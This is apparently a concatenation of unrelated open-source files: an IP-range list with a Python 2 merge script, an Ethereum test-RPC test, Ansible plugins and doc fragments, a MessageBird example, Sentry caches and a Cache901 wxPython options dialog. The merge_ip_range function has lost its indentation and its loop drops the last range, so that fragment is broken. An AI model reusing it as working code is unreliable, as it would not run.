216.58.208.0/20
216.109.75.80-216.109.75.95
216.239.32.0-216.239.63.255
218.176.242.0-218.176.242.255
218.253.0.0/24
1.179.248-255.0-255
103.246.187.0-255
103.25.178.4-59
106.162.192.148-187
106.162.198.84-123
106.162.216.20-123
107.167.160-191.0-255
107.178.192-255.0-255
107.188.128-255.0-255
108.170.192-255.0-255
108.177.0-127.0-255
108.59.80-95.0-255
109.232.83.64-127
111.168.255.20-187
111.92.162.4-59
113.197.105-106.0-255
118.174.24-27.0-255
12.216.80.0-255
121.78.74.68-123
123.205.250-251.68-190
130.211.0-255.0-255
142.250-251.0-255.0-255
146.148.0-127.0-255
149.126.86.1-59
149.3.177.0-255
162.216.148-151.0-255
162.222.176-183.0-255
163.28.116.1-59
163.28.83.143-187
172.217.0-255.0-255
172.253.0-255.0-255
173.194.0-255.0-255
173.255.112-127.0-255
178.45.251.4-123
178.60.128.1-63
185.25.28-29.0-255
192.119.16-31.0-255
192.158.28-31.0-255
192.178-179.0-255.0-255
192.200.224-255.0-255
193.120.166.64-127
193.134.255.0-255
193.142.125.0-255
193.186.4.0-255
193.192.226.128-191
193.192.250.128-191
193.200.222.0-255
193.247.193.0-255
193.90.147.0-123
193.92.133.0-63
194.100.132.128-143
194.110.194.0-255
194.78.20.16-31
194.78.99.0-255
195.100.224.112-127
195.141.3.24-27
195.205.170.64-79
195.229.194.88-95
195.244.106.0-255
195.244.120.144-159
195.249.20.192-255
195.65.133.128-135
195.76.16.136-143
195.81.83.176-207
196.3.58-59.0-255
197.199.253-254.1-59
197.84.128.0-63
199.192.112-115.0-255
199.223.232-239.0-255
202.39.143.1-123
203.116.165.129-255
203.117.34-37.132-187
203.165.13-14.210-251
203.211.0.4-59
203.66.124.129-251
207.223.160-175.0-255
208.117.224-255.0-255
208.65.152-155.0-255
209.85.128-255.0-255
210.139.253.20-251
210.153.73.20-123
210.242.125.20-59
210.61.221.65-187
212.154.168.224-255
212.162.51.64-127
212.181.117.144-159
212.188.10.0-255
212.188.15.0-255
212.188.7.0-255
213.186.229.0-63
213.187.184.68-71
213.240.44.0-31
213.252.15.0-31
213.31.219.80-87
216.21.160-175.0-255
216.239.32-63.0-255
216.58.192-223.0-255
217.149.45.16-31
217.163.7.0-255
217.193.96.38
217.28.250.44-47
217.28.253.32-33
217.30.152.192-223
217.33.127.208-223
218.176.242.4-251
218.189.25.129-187
218.253.0.76-187
23.228.128-191.0-255
23.236.48-63.0-255
23.251.128-159.0-255
23.255.128-255.0-255
24.156.131.0-255
31.209.137.0-255
31.7.160.192-255
37.228.69.0-63
41.206.96.1-251
41.84.159.12-30
60.199.175.1-187
61.219.131.65-251
62.0.54.64-127
62.1.38.64-191
62.116.207.0-63
62.197.198.193-251
62.20.124.48-63
62.201.216.196-251
63.243.168.0-255
64.15.112-127.0-255
64.233.160-191.0-255
64.9.224-255.0-255
66.102.0-15.0-255
66.185.84.0-255
66.249.64-95.0-255
69.17.141.0-255
70.32.128-159.0-255
72.14.192-255.0-255
74.125.0-255.0-255
77.109.131.208-223
77.40.222.224-231
77.42.248-255.0-255
77.66.9.64-123
78.8.8.176-191
8.15.202.0-255
8.22.56.0-255
8.34.208-223.0-255
8.35.192-207.0-255
8.6.48-55.0-255
8.8.4.0-255
8.8.8.0-255
80.227.152.32-39
80.228.65.128-191
80.231.69.0-63
80.239.168.192-255
80.80.3.176-191
81.175.29.128-191
81.93.175.232-239
82.135.118.0-63
83.100.221.224-255
83.141.89.124-127
83.145.196.128-191
83.220.157.100-103
83.94.121.128-255
84.233.219.144-159
84.235.77.1-251
85.182.250.0-191
86.127.118.128-191
87.244.198.160-191
88.159.13.192-255
89.207.224-231.0-255
89.96.249.160-175
92.45.86.16-31
93.123.23.1-59
93.183.211.192-255
93.94.217-218.0-31
94.200.103.64-71
94.40.70.0-63
95.143.84.128-191
61.19.1-2.0-127
61.19.8.0-127
113.21.24.0-127
118.143.88.16-123
202.86.162.20-187
139.175.107.20-187
223.26.69.16-59
220.255.5-6.20-251
202.65.246.84-123
103.1.139.148-251
116.92.194.148-187
58.145.238.20-59
41.201.128.20-59
41.201.164.20-59
222.255.120.15-59
119.81.145.120-127
119.81.142.202
23.239.5.106
74.207.242.141
'''
def PRINT(strlog):
    """Log helper: write *strlog* to stdout (single point to redirect)."""
    message = strlog
    print (message)
def merge_ip_range():
ip_range_list = []
ip_lines_list = re.split("\r|\n", ip_str_list)
for iplines in ip_lines_list:
if len(iplines) == 0 or iplines[0] == '#':
#print "non:", iplines
continue
ips = re.split(",|\|", iplines)
for line in ips:
if len(line) == 0 or line[0] == '#':
#print "non line:", line
continue
begin, end = ip_utils.split_ip(line)
if ip_utils.check_ip_valid(begin) == 0 or ip_utils.check_ip_valid(end) == 0:
PRINT("ip format is error,line:%s, begin: %s,end: %s" % (line, begin, end))
continue
nbegin = ip_utils.ip_string_to_num(begin)
nend = ip_utils.ip_string_to_num(end)
ip_range_list.append([nbegin,nend])
#print begin, end
ip_range_list.sort()
# merge range
ip_range_list_2 = []
range_num = len(ip_range_list)
last_begin = ip_range_list[0][0]
last_end = ip_range_list[0][1]
for i in range(1,range_num - 1):
ip_range = ip_range_list[i]
begin = ip_range[0]
end = ip_range[1]
#print "now:",ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
if begin > last_end + 2:
#print "add:",ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
ip_range_list_2.append([last_begin, last_end])
last_begin = begin
last_end = end
else:
print "merge:", ip_utils.ip_num_to_string(last_begin), ip_utils.ip_num_to_string(last_end), ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
if end > last_end:
last_end = end
ip_range_list_2.append([last_begin, last_end])
for ip_range in ip_range_list_2:
begin = ip_range[0]
end = ip_range[1]
print ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
# write out
fd = open("ip_range.txt", "w")
for ip_range in ip_range_list_2:
begin = ip_range[0]
end = ip_range[1]
#print ip_utils.ip_num_to_string(begin), ip_utils.ip_num_to_string(end)
fd.write(ip_utils.ip_num_to_string(begin)+ "-" + ip_utils.ip_num_to_string(end)+"\n")
fd.close()
merge_ip_range()
def test_load():
    # Sanity check: re-read ip_range.txt written by merge_ip_range(),
    # print each range with its size and report the total address count.
    fd = open("ip_range.txt", "r")
    # NOTE(review): dead check -- open() raises IOError on failure
    # instead of returning a falsy handle, so this branch never runs.
    if not fd:
        print "open ip_range.txt fail."
        exit()
    amount = 0
    for line in fd.readlines():
        if len(line) == 0 or line[0] == '#':
            continue
        begin, end = ip_utils.split_ip(line)
        nbegin = ip_utils.ip_string_to_num(begin)
        nend = ip_utils.ip_string_to_num(end)
        num = nend - nbegin
        amount += num
        print ip_utils.ip_num_to_string(nbegin), ip_utils.ip_num_to_string(nend), num
    fd.close()
    print "amount:", amount
#
test_load()
|
ConsenSys/eth-testrpc
|
refs/heads/master
|
tests/client/test_get_block_by_number.py
|
3
|
def test_get_block_with_no_transactions(client, hex_accounts):
    # Block 1 is mined with no transactions: check the basic header
    # fields returned by get_block_by_number.
    client.wait_for_block(1)
    block = client.get_block_by_number(1)
    assert block['number'] == b"0x1"
    # The miner should be the first (coinbase) test account.
    assert block['miner'] == hex_accounts[0]
    assert len(block['transactions']) == 0
    # Empty logs bloom: "0x" followed by 256 zero bytes in hex.
    assert block['logsBloom'] == b"0x" + b"00" * 256
def test_get_block_with_transactions(client, hex_accounts):
    # Send one value transfer and verify the mined block contains
    # exactly that transaction.
    tx_hash = client.send_transaction(
        _from=hex_accounts[0],
        to=hex_accounts[1],
        value=1234,
        data="0x1234",
        gas=100000,
    )
    tx_receipt = client.get_transaction_receipt(tx_hash)
    assert tx_receipt
    assert tx_receipt['transactionHash'] == tx_hash
    # Look up the block the receipt says the tx was mined into.
    block_number = tx_receipt['blockNumber']
    block = client.get_block_by_number(block_number)
    assert len(block['transactions']) == 1
|
rwl/muntjac
|
refs/heads/master
|
muntjac/addon/invient/__init__.py
|
12133432
| |
kencung/configuration
|
refs/heads/master
|
playbooks/callback_plugins/hipchat_plugin.py
|
51
|
import os
import time
from ansible import utils
try:
import prettytable
except ImportError:
prettytable = None
try:
import hipchat
except ImportError:
hipchat = None
class CallbackModule(object):
    """Send status updates to a HipChat channel during playbook execution.

    This plugin makes use of the following environment variables:
        HIPCHAT_TOKEN (required): HipChat API token
        HIPCHAT_ROOM (optional): HipChat room to post in. Default: ansible
        HIPCHAT_FROM (optional): Name to post as. Default: ansible
        HIPCHAT_NOTIFY (optional): Add notify flag to important messages ("true" or "false"). Default: true
        HIPCHAT_MSG_PREFIX (option): Optional prefix to add to all hipchat messages
        HIPCHAT_MSG_COLOR (option): Optional color for hipchat messages
        HIPCHAT_CONDENSED (option): Condense the task summary output ("true" or "false"). Default: true
    Requires:
        prettytable
    """

    def __init__(self):
        # The plugin is a no-op unless a HipChat token is configured.
        self.enabled = "HIPCHAT_TOKEN" in os.environ
        if not self.enabled:
            return

        # make sure we got our imports
        if not hipchat:
            raise ImportError(
                "The hipchat plugin requires the hipchat Python module, "
                "which is not installed or was not found."
            )
        if not prettytable:
            raise ImportError(
                "The hipchat plugin requires the prettytable Python module, "
                "which is not installed or was not found."
            )

        self.start_time = time.time()
        self.task_report = []
        # Rolling state for the task currently being aggregated.
        self.last_task = None
        self.last_task_changed = False
        self.last_task_count = 0
        self.last_task_delta = 0
        self.last_task_start = time.time()
        # BUG FIX: the old check `os.getenv('HIPCHAT_CONDENSED', True) == True`
        # was only ever true when the variable was *unset* (getenv returns
        # strings), so setting HIPCHAT_CONDENSED=true actually disabled
        # condensing.  Mirror the HIPCHAT_NOTIFY handling instead: any value
        # other than "false" enables the condensed report.
        self.condensed_task_report = (
            str(os.getenv('HIPCHAT_CONDENSED', 'true')).lower() != 'false')
        self.room = os.getenv('HIPCHAT_ROOM', 'ansible')
        self.from_name = os.getenv('HIPCHAT_FROM', 'ansible')
        self.allow_notify = (os.getenv('HIPCHAT_NOTIFY') != 'false')
        try:
            self.hipchat_conn = hipchat.HipChat(token=os.getenv('HIPCHAT_TOKEN'))
        except Exception as e:
            utils.warning("Unable to connect to hipchat: {}".format(e))
        self.hipchat_msg_prefix = os.getenv('HIPCHAT_MSG_PREFIX', '')
        self.hipchat_msg_color = os.getenv('HIPCHAT_MSG_COLOR', '')
        self.printed_playbook = False
        self.playbook_name = None

    def _send_hipchat(self, message, room=None, from_name=None, color=None, message_format='text'):
        """Post *message* to HipChat, falling back to the configured defaults.

        Errors are logged as warnings rather than raised so that a HipChat
        outage never aborts the playbook run.
        """
        if not room:
            room = self.room
        if not from_name:
            from_name = self.from_name
        if not color:
            color = self.hipchat_msg_color
        try:
            self.hipchat_conn.message_room(room, from_name, message, color=color, message_format=message_format)
        except Exception as e:
            utils.warning("Could not submit message to hipchat: {}".format(e))

    def _flush_last_task(self):
        """Fold the accumulated per-task counters into task_report and reset them."""
        if self.last_task:
            # (removed an unused `delta = time.time() - self.last_task_start`
            # local: the reported delta is the accumulated per-result delta.)
            self.task_report.append(dict(
                changed=self.last_task_changed,
                count=self.last_task_count,
                delta="{:0>.1f}".format(self.last_task_delta),
                task=self.last_task))
            self.last_task_count = 0
            self.last_task_changed = False
            self.last_task = None
            self.last_task_delta = 0

    def _process_message(self, msg, msg_type='STATUS'):
        """Aggregate a runner/playbook event into the rolling task state.

        OK results accumulate into the current task; any other type flushes
        the current task first.  FAILED results are reported immediately.
        """
        if msg_type == 'OK' and self.last_task:
            if msg.get('changed', True):
                self.last_task_changed = True
            if msg.get('delta', False):
                # delta arrives as "H:MM:SS.ssssss"; convert to seconds.
                (hour, minute, sec) = msg['delta'].split(':')
                # BUG FIX: hours were multiplied by 1200 instead of 3600.
                total = float(hour) * 3600 + float(minute) * 60 + float(sec)
                self.last_task_delta += total
            self.last_task_count += 1
        else:
            self._flush_last_task()

        if msg_type == 'TASK_START':
            self.last_task = msg
            self.last_task_start = time.time()
        elif msg_type == 'FAILED':
            self.last_task_start = time.time()
            if 'msg' in msg:
                self._send_hipchat('/code {}: The ansible run returned the following error:\n\n {}'.format(
                    self.hipchat_msg_prefix, msg['msg']), color='red', message_format='text')
        else:
            # move forward the last task start time
            self.last_task_start = time.time()

    def on_any(self, *args, **kwargs):
        pass

    def runner_on_failed(self, host, res, ignore_errors=False):
        if self.enabled:
            self._process_message(res, 'FAILED')

    def runner_on_ok(self, host, res):
        if self.enabled:
            # don't send the setup results
            if res['invocation']['module_name'] != "setup":
                self._process_message(res, 'OK')

    def runner_on_error(self, host, msg):
        if self.enabled:
            self._process_message(msg, 'ERROR')

    def runner_on_skipped(self, host, item=None):
        if self.enabled:
            self._process_message(item, 'SKIPPED')

    def runner_on_unreachable(self, host, res):
        pass

    def runner_on_no_hosts(self):
        pass

    def runner_on_async_poll(self, host, res, jid, clock):
        if self.enabled:
            self._process_message(res, 'ASYNC_POLL')

    def runner_on_async_ok(self, host, res, jid):
        if self.enabled:
            self._process_message(res, 'ASYNC_OK')

    def runner_on_async_failed(self, host, res, jid):
        if self.enabled:
            self._process_message(res, 'ASYNC_FAILED')

    def playbook_on_start(self):
        pass

    def playbook_on_notify(self, host, handler):
        pass

    def playbook_on_no_hosts_matched(self):
        pass

    def playbook_on_no_hosts_remaining(self):
        pass

    def playbook_on_task_start(self, name, is_conditional):
        if self.enabled:
            self._process_message(name, 'TASK_START')

    def playbook_on_vars_prompt(self, varname, private=True, prompt=None,
                                encrypt=None, confirm=False, salt_size=None,
                                salt=None, default=None):
        pass

    def playbook_on_setup(self):
        pass

    def playbook_on_import_for_host(self, host, imported_file):
        pass

    def playbook_on_not_import_for_host(self, host, missing_file):
        pass

    def playbook_on_play_start(self, pattern):
        """Display Playbook and play start messages."""
        # NOTE(review): `self.play` is not assigned anywhere in this class;
        # presumably the ansible playbook runner attaches it to callback
        # plugins before this hook fires — verify against the ansible version
        # in use.
        if self.enabled:
            self.start_time = time.time()
            self.playbook_name, _ = os.path.splitext(os.path.basename(self.play.playbook.filename))
            host_list = self.play.playbook.inventory.host_list
            inventory = os.path.basename(os.path.realpath(host_list))
            subset = self.play.playbook.inventory._subset
            msg = "<b>{description}</b>: Starting ansible run for play <b><i>{play}</i></b>".format(description=self.hipchat_msg_prefix, play=self.playbook_name)
            if self.play.playbook.only_tags and 'all' not in self.play.playbook.only_tags:
                msg = msg + " with tags <b><i>{}</i></b>".format(','.join(self.play.playbook.only_tags))
            if subset:
                msg = msg + " on hosts <b><i>{}</i></b>".format(','.join(subset))
            self._send_hipchat(msg, message_format='html')

    def playbook_on_stats(self, stats):
        """Display info about playbook statistics."""
        if self.enabled:
            self._flush_last_task()
            delta = time.time() - self.start_time
            self.start_time = time.time()

            hosts = sorted(stats.processed.keys())
            task_column = '{} - Task'.format(self.hipchat_msg_prefix)
            task_summary = prettytable.PrettyTable([task_column, 'Time', 'Count', 'Changed'])
            task_summary.align[task_column] = "l"
            task_summary.align['Time'] = "r"
            task_summary.align['Count'] = "r"
            task_summary.align['Changed'] = "r"
            for task in self.task_report:
                if self.condensed_task_report:
                    # for the condensed task report skip all tasks
                    # that are not marked as changed and that have
                    # a time delta less than 1
                    if not task['changed'] and float(task['delta']) < 1:
                        continue
                task_summary.add_row([task['task'], task['delta'], str(task['count']), str(task['changed'])])
            # (removed an unused `summary_table` PrettyTable that was built
            # but never populated or sent.)
            self._send_hipchat("/code " + str(task_summary))

            summary_all_host_output = []
            for host in hosts:
                # BUG FIX: the per-host summary used to be bound to the name
                # `stats`, clobbering the stats object and breaking every
                # host after the first.
                host_stats = stats.summarize(host)
                summary_output = "<b>{}</b>: <i>{}</i> - ".format(self.hipchat_msg_prefix, host)
                for summary_item in ['ok', 'changed', 'unreachable', 'failures']:
                    if host_stats[summary_item] != 0:
                        summary_output += "<b>{}</b> - {} ".format(summary_item, host_stats[summary_item])
                summary_all_host_output.append(summary_output)
            self._send_hipchat("<br />".join(summary_all_host_output), message_format='html')
            msg = "<b>{description}</b>: Finished Ansible run for <b><i>{play}</i> in {min:02} minutes, {sec:02} seconds</b><br /><br />".format(
                description=self.hipchat_msg_prefix,
                play=self.playbook_name,
                min=int(delta / 60),
                sec=int(delta % 60))
            self._send_hipchat(msg, message_format='html')
|
JetBrains/intellij-community
|
refs/heads/master
|
python/testData/refactoring/makeFunctionTopLevel/methodNotImportableDestinationFile/before/main.py
|
31
|
class C:
def met<caret>hod(self):
pass
C().method()
|
anryko/ansible
|
refs/heads/devel
|
lib/ansible/plugins/doc_fragments/junos.py
|
44
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Sprygada <psprygada@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
    # Shared documentation fragment for junos_* modules: Ansible merges this
    # YAML into each module's DOCUMENTATION via `extends_documentation_fragment`.
    # Standard files documentation fragment
    DOCUMENTATION = r'''
options:
  provider:
    description:
      - B(Deprecated)
      - "Starting with Ansible 2.5 we recommend using C(connection: network_cli) or C(connection: netconf)."
      - For more information please see the L(Junos OS Platform Options guide, ../network/user_guide/platform_junos.html).
      - HORIZONTALLINE
      - A dict object containing connection details.
    type: dict
    suboptions:
      host:
        description:
          - Specifies the DNS host name or address for connecting to the remote
            device over the specified transport.  The value of host is used as
            the destination address for the transport.
        type: str
        required: true
      port:
        description:
          - Specifies the port to use when building the connection to the remote
            device.  The port value will default to the well known SSH port
            of 22 (for C(transport=cli)) or port 830 (for C(transport=netconf))
            device.
        type: int
        default: 22
      username:
        description:
          - Configures the username to use to authenticate the connection to
            the remote device.  This value is used to authenticate
            the SSH session. If the value is not specified in the task, the
            value of environment variable C(ANSIBLE_NET_USERNAME) will be used instead.
        type: str
      password:
        description:
          - Specifies the password to use to authenticate the connection to
            the remote device.   This value is used to authenticate
            the SSH session. If the value is not specified in the task, the
            value of environment variable C(ANSIBLE_NET_PASSWORD) will be used instead.
        type: str
      timeout:
        description:
          - Specifies the timeout in seconds for communicating with the network device
            for either connecting or sending commands.  If the timeout is
            exceeded before the operation is completed, the module will error.
        type: int
        default: 10
      ssh_keyfile:
        description:
          - Specifies the SSH key to use to authenticate the connection to
            the remote device.   This value is the path to the
            key used to authenticate the SSH session. If the value is not specified
            in the task, the value of environment variable C(ANSIBLE_NET_SSH_KEYFILE)
            will be used instead.
        type: path
notes:
  - For information on using CLI and netconf see the :ref:`Junos OS Platform Options guide <junos_platform_options>`
  - For more information on using Ansible to manage network devices see the :ref:`Ansible Network Guide <network_guide>`
  - For more information on using Ansible to manage Juniper network devices see U(https://www.ansible.com/ansible-juniper).
'''
|
messagebird/python-rest-api
|
refs/heads/master
|
examples/call_delete.py
|
1
|
#!/usr/bin/env python
"""Example: delete a MessageBird call by its ID."""
import os
import sys
import json
import argparse

import requests

# Make the repository root importable so the local `messagebird` package is used.
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import messagebird


def main():
    """Parse CLI arguments and delete the given MessageBird call."""
    # BUG FIX: the usage string previously named call_create.py (copy/paste
    # from the create example).
    parser = argparse.ArgumentParser(usage='call_delete.py\
    --accessKey="*******" \
    --callId=dda20377-72da-4846-9b2c-0fea3ad4bcb6 \
    ')
    parser.add_argument('--accessKey', help='Access key for MessageBird API.', type=str, required=True)
    parser.add_argument('--callId', help='The ID of the MessageBird call to delete.', type=str, required=True)
    args = vars(parser.parse_args())

    try:
        # Create a MessageBird client with the specified accessKey.
        client = messagebird.Client(args['accessKey'])
        # Delete the call with the specified callId.  (The unused `call`
        # binding was removed: call_delete is invoked for its effect.)
        client.call_delete(args['callId'])
        # If no error is thrown, the delete was successful.
        print('\nDeleted call with id `%s` successfully!' % args['callId'])
    except messagebird.client.ErrorException as e:
        # BUG FIX: the message previously said "creating a call".
        print('\nAn error occurred while deleting a call:\n')
        for error in e.errors:
            print('  code        : %d' % error.code)
            print('  description : %s' % error.description)
            print('  parameter   : %s' % error.parameter)
            print('  type        : %s' % error.__class__)
    except requests.exceptions.HTTPError as e:
        print('\nAn http exception occurred while deleting a call:')
        print(' ', e)
        print('  Http request body    : ', e.request.body)
        print('  Http response status : ', e.response.status_code)
        print('  Http response body   : ', e.response.content.decode())
    except Exception as e:
        print('\nAn ', e.__class__, ' exception occurred while deleting a call:')
        print(e)


if __name__ == '__main__':
    main()
|
gencer/sentry
|
refs/heads/master
|
src/sentry/lang/javascript/cache.py
|
3
|
from __future__ import absolute_import, print_function
from six import text_type
from symbolic import SourceView
from sentry.utils.strings import codec_lookup
__all__ = ['SourceCache', 'SourceMapCache']
def is_utf8(codec):
    """Return True if *codec* resolves to a UTF-8 compatible encoding."""
    return codec_lookup(codec).name in ('utf-8', 'ascii')
class SourceCache(object):
    """In-memory cache mapping source URLs to ``SourceView`` objects.

    URLs may be aliased to one another; every lookup goes through the
    canonical (target) URL.  Fetch errors are tracked per canonical URL.
    """

    def __init__(self):
        self._cache = {}
        self._errors = {}
        self._aliases = {}

    def __contains__(self, url):
        return self._get_canonical_url(url) in self._cache

    def _get_canonical_url(self, url):
        # Follow a single alias hop, if one is registered.
        return self._aliases.get(url, url)

    def get(self, url):
        return self._cache.get(self._get_canonical_url(url))

    def get_errors(self, url):
        return self._errors.get(self._get_canonical_url(url), [])

    def alias(self, alias, target):
        # A self-alias would be a pointless (and loop-prone) entry; skip it.
        if alias != target:
            self._aliases[alias] = target

    def add(self, url, source, encoding=None):
        canonical = self._get_canonical_url(url)
        if not isinstance(source, SourceView):
            if isinstance(source, text_type):
                source = source.encode('utf-8')
            # If an encoding is provided and it's not utf-8 compatible,
            # re-encode the bytes to utf-8 before building the view;
            # on failure fall back to the raw bytes.
            elif encoding is not None and not is_utf8(encoding):
                try:
                    source = source.decode(encoding).encode('utf-8')
                except UnicodeError:
                    pass
            source = SourceView.from_bytes(source)
        self._cache[canonical] = source

    def add_error(self, url, error):
        self._errors.setdefault(self._get_canonical_url(url), []).append(error)
class SourceMapCache(object):
    """Cache of parsed sourcemaps plus a source-URL -> sourcemap-URL mapping."""

    def __init__(self):
        self._cache = {}
        self._mapping = {}

    def __contains__(self, sourcemap_url):
        return sourcemap_url in self._cache

    def link(self, url, sourcemap_url):
        """Record that *url* is covered by the sourcemap at *sourcemap_url*."""
        self._mapping[url] = sourcemap_url

    def add(self, sourcemap_url, sourcemap_view):
        self._cache[sourcemap_url] = sourcemap_view

    def get(self, sourcemap_url):
        return self._cache.get(sourcemap_url)

    def get_link(self, url):
        """Return ``(sourcemap_url, sourcemap)`` for *url*, or ``(None, None)``."""
        sourcemap_url = self._mapping.get(url)
        if not sourcemap_url:
            return (None, None)
        return (sourcemap_url, self.get(sourcemap_url))
|
RossBrunton/django
|
refs/heads/master
|
django/contrib/redirects/__init__.py
|
808
|
# Tell Django which AppConfig class to use when this app is listed by its
# bare module path ("django.contrib.redirects") in INSTALLED_APPS.
default_app_config = 'django.contrib.redirects.apps.RedirectsConfig'
|
turbomanage/training-data-analyst
|
refs/heads/master
|
courses/machine_learning/deepdive2/structured/solutions/serving/application/appengine_config.py
|
25
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Register the bundled third-party packages in ./lib with App Engine's
# vendoring mechanism so they become importable at runtime.
from google.appengine.ext import vendor
vendor.add('lib')
|
rboman/progs
|
refs/heads/master
|
sandbox/fortranpython/test1/scripts/calcul1.py
|
1
|
# Smoke-test driver for the f2py-generated `vect` Fortran extension module:
# lists its symbols, calls `norme`, then fills/prints Fibonacci arrays via
# the two wrapped routines.
import numpy as np
import math
import vect
print(dir(vect))
# norme of a unit vector (sin^2 + cos^2 = 1); called for its side effect here.
vect.norme(math.sin(0.5),math.cos(0.5))
print("----fib----")
print(vect.fib.__doc__)
# fib fills a caller-allocated double array in place.
a = np.zeros(8,'d')
vect.fib(a)
print(a)
print("----fib2----")
print(vect.fib2.__doc__)
# fib2 returns its result instead of filling an argument.
print(vect.fib2(10))
print("retour a python")
|
IllusionRom-deprecated/android_platform_tools_idea
|
refs/heads/master
|
python/testData/inspections/PyClassHasNoInitInspection/unresolvedParent.py
|
83
|
__author__ = 'ktisha'
class B(ABC):
    # NOTE(review): `ABC` is deliberately unresolved — this file is IDE
    # inspection test data (PyClassHasNoInitInspection/unresolvedParent);
    # do not "fix" the missing import.
    def foo(self):
        self.b = 1
|
pedersen/cache901
|
refs/heads/master
|
cache901/options.py
|
1
|
"""
Cache901 - GeoCaching Software for the Asus EEE PC 901
Copyright (C) 2007, Michael J. Pedersen <m.pedersen@icelus.org>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
import os
import os.path
import serial
import wx
from sqlalchemy import and_
import cache901
import cache901.ui_xrc
import cache901.util
import cache901.validators
from cache901 import sadbobjects
import gpsbabel
class OptionsUI(cache901.ui_xrc.xrcOptionsUI):
    """Cache901 options dialog.

    Wraps the XRC-generated dialog and wires up the General, Search,
    Cache Day, GeoCaching Accounts and GUI Preferences tabs.  All
    persistence goes through the SQLAlchemy session from cache901.db().
    """
    def __init__(self, listOfCaches, parent=None):
        # listOfCaches is the main window's wx.ListCtrl of caches; its third
        # column (index 2) holds the cache name copied into "Available Caches".
        cache901.ui_xrc.xrcOptionsUI.__init__(self, parent)
        self.colsRearranged = False
        self.gpsbabelLoc.SetValidator(cache901.validators.cmdValidator())
        self.gpsPort.SetValidator(cache901.validators.portValidator())
        self.gpsType.SetValidator(cache901.validators.gpsTypeValidator())
        self.coordDisplay.SetValidator(cache901.validators.degDisplayValidator())
        self.locSplit.SetValidator(cache901.validators.splitValidator("optsplitloc"))
        self.acctTabSplit.SetValidator(cache901.validators.splitValidator("optsplitacct"))
        self.maxLogs.SetValidator(cache901.validators.spinCtlValidator("dbMaxLogs"))
        # Use the pixel width of a representative wide string for all columns.
        w,h = self.GetTextExtent("QQQQQQQQQQQQQQQQQQ")
        self.cacheDays.InsertColumn(0, 'Cache Day', width=w)
        self.cachesForDay.InsertColumn(0, 'Caches For Day', width=w)
        self.availCaches.InsertColumn(0, 'Available Caches', width=w)
        self.accountNames.InsertColumn(0, 'GeoCaching Accounts', width=w)
        # Bare isinstance() call is a no-op kept as an IDE type hint
        # (same idiom as forWingIde below).
        isinstance(listOfCaches, wx.ListCtrl)
        idx = 0
        while idx < listOfCaches.GetItemCount():
            cache_item = listOfCaches.GetItem(idx, 2)
            ctext = cache_item.GetText()
            iid = self.availCaches.Append((ctext, ))
            self.availCaches.SetItemData(iid, listOfCaches.GetItemData(idx))
            idx = idx + 1
        self.loadOrigins()
        self.listCacheDays()
        self.loadAccounts()
        self.loadGUIPreferences()
        self.Bind(wx.EVT_BUTTON, self.OnRemoveOrigin, self.remLoc)
        self.Bind(wx.EVT_BUTTON, self.OnAddOrigin, self.addLoc)
        self.Bind(wx.EVT_BUTTON, self.OnClearSelection, self.clearSel)
        self.Bind(wx.EVT_BUTTON, self.OnGetFromGPS, self.getFromGPS)
        self.Bind(wx.EVT_BUTTON, self.OnAddCacheDay, self.addCacheDay)
        self.Bind(wx.EVT_BUTTON, self.OnRemCacheDay, self.remCacheDay)
        self.Bind(wx.EVT_BUTTON, self.OnCacheUp, self.upCache)
        self.Bind(wx.EVT_BUTTON, self.OnCacheDown, self.downCache)
        self.Bind(wx.EVT_BUTTON, self.OnAddCache, self.addCache)
        self.Bind(wx.EVT_BUTTON, self.OnRemCache, self.remCache)
        self.Bind(wx.EVT_BUTTON, self.OnRenameCacheDay, self.btnRenameCacheDay)
        self.Bind(wx.EVT_BUTTON, self.OnAddAccount, self.btnAddAcount)
        self.Bind(wx.EVT_BUTTON, self.OnRemAccount, self.btnRemAccount)
        self.Bind(wx.EVT_BUTTON, self.OnSaveAccount, self.btnSaveAccount)
        self.Bind(wx.EVT_BUTTON, self.OnColMoveUp, self.colMoveUpButton)
        self.Bind(wx.EVT_BUTTON, self.OnColMoveDown, self.colMoveDownButton)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadOrigin, self.locations)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadCacheDay, self.cacheDays)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnLoadAccount, self.accountNames)
        self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnColumnSelect, self.colOrderList)
        self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnColumnDeselect, self.colOrderList)
        self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnAddCache, self.availCaches)
    def loadAccounts(self):
        """Reload the account list from the DB and reset the account detail
        widgets to a disabled, empty state."""
        self.accountNames.DeleteAllItems()
        for acct in cache901.db().query(sadbobjects.Accounts):
            aid = self.accountNames.Append(('%s@%s' % (acct.username, acct.sitename), ))
            self.accountNames.SetItemData(aid, acct.accountid)
        self.btnRemAccount.Disable()
        self.acctType.Disable()
        self.acctType.SetSelection(0)
        self.acctUsername.Disable()
        self.acctUsername.SetValue('')
        self.acctPassword.Disable()
        self.acctPassword.SetValue('')
        self.acctIsPremium.Disable()
